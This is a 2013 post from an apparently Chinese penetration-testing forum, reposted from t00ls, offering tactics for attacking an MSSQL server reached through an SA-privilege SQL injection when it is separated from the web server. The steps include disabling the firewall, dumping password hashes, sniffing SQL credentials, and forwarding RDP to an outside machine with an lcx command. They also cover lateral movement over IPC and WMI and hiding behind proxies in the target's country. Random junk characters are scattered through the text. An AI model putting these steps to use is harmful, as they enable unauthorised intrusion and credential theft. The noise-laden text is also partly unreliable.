中国网络渗透测试联盟

标题: SA权限网站和数据库分离的一些思路 [打印本页]

作者: admin    时间: 2013-2-16 21:46
标题: SA权限网站和数据库分离的一些思路
当你碰到SA的注入点,可以执行命令,但是web与数据库分离,你都会怎么做呢,当数据库不服务器不能连接外网的时候,是不是只想着从web搞呢,这篇文章从t00ls转载过来,希望对大家sa权限的注入点数据库web分离提供一些渗透思路。
4 T8 W$ d& d" q4 G" p  p$ {
8 b7 o% I1 }9 k( Q+ C" B
3 l% Z: p% g: L- U7 k! P; S/ p9 e* P+ _4 v4 l5 u
SA点,system权限,可执行命令,web和db分离.DB机器不上网(一般指中马不上线,lcx反弹不出)
- g) y# D; C; S4 P0 d0 r* F, f& ~8 V' V& G

4 l# p/ z1 |8 z4 D& n一、DB机有公网IP.( R+ y; l8 Y4 d5 K: b' I

9 X, c) [$ n& U% i  k1:执行命令把系统防火墙和ip策略停止,netstat -an找到3389端口尝试连接.1 ?# N( t0 N, V* V
1 k, u, V: A; n$ V+ n
3 A5 t/ X6 k% O" D
2:从内往外扫描.把命令行下的s扫描器转成vbs传上DB机器生成exe扫描外网一台做了端口策略的机器.这台外网机器开放所有端口.(可以到网上找这 样的 机器.) 如果扫描结果有开放端口,证明在这台DB机可以把3389转到外面机器.比如扫到80 那就lcx -slave ip 80 127.0.0.1 3389.# `* T! `1 _5 y. L

6 \0 k! X5 h" d7 m
, z7 B+ S/ q6 W$ ?) V! l3:尽量多拿密码.用vbs的方法上传gethash,sqlsniffer类的工具.拿到系统和mssql的密 码,数据库表的后台管理员密码,member表的最前几个用户密码.这些密码可以用来测试web后台,web的3389 ftp等.当然事先要对web机器完整扫描一遍. www.2cto.com
% i+ w* G3 _$ w7 k% H" E5 W' x* \+ ?) ?. o& y( t# e8 Z. M

5 {: J, M6 y! e% T/ V, X3 T4,nmap扫描.用nmap扫描web和db机器的1-65535端口.如果发现db机器显示有closed的端口.那恭喜你,你可以lcx -tran 把3389转发到该端口直接登陆.firewalk也有类似功能.但对代理防火墙无用.6 a2 B5 q0 C! u; h; }
% e$ U0 a; Z0 D# R6 a; o; [4 _
5 v$ e# F  R" s4 A! y) Z* y! m
) J# J. ]2 X/ y
二、DB机只有内网IP
$ ]; j3 I" K) ~6 r+ ~
7 ]7 f( ~* g1 `& G/ U; g5 I. e1:尽量多拿密码来net use到web机器.这个过程需要极大的耐心 , 拿密码尝试登陆web后台等.( f2 j2 _' r( N/ v
8 K& B+ q% b6 `& V

9 g1 g, R& S7 j- N/ w$ N2:停掉防火墙和IP策略再从内往外扫描.
+ T- w3 a; o2 F' d8 n
' h: p7 g1 o2 j+ p$ E% f4 \4 W/ s9 \: p8 Y) a! u5 M; J
3: ipconfig /dispalydns如果发现有公网的域名,极大可能是路由做了手脚.机会还是有的.& f+ G6 A1 Y, b7 l" U4 ]
+ H4 u# C4 H1 s, Y
6 x! ^& J& k8 u+ g
4:学会密码规律分析往往会有惊喜.
. Q- }4 Z. O) O/ x6 c, D9 F) }$ a+ o' w
. V, \# i# n" N! }
5,在sa点里执行命令渗透内网,找可上网的机器.isql,ipc共享,wmi等( @% F& p5 v/ y1 |
, B9 c* V  \, Q: s" V* f5 }
% ?5 W8 p# F3 b; S( y
有些地区或国家会禁止别的国家连接一些端口,所以拥有目标国代理或VPN是很重要的​




欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2